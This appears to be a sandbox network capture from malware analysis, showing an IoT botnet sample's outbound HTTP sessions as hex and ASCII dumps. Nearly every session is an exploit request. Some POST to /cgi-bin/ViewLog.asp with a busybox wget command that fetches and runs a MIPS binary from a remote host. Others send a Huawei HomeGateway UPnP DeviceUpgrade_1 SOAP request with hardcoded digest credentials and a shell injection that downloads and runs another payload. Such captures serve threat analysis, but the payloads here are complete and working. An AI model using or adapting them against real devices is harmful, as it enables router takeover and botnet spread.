                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              450192.168.2.133926431.136.79.408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:32.996381998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.606301069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:34.790267944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:37.318316936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:42.182245016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.654246092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.134187937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              451192.168.2.134900694.102.215.1878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.002927065 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:33.196481943 CET359INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:33 GMT
                                              Server: Apache
                                              Content-Length: 127
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                              Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              452192.168.2.135673662.29.2.1458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.028803110 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              453192.168.2.134889694.122.198.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.046068907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              454192.168.2.1340548156.241.85.22037215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:33.331469059 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:35.302300930 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:37.830297947 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:42.694982052 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:52.166218996 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:12.134176970 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
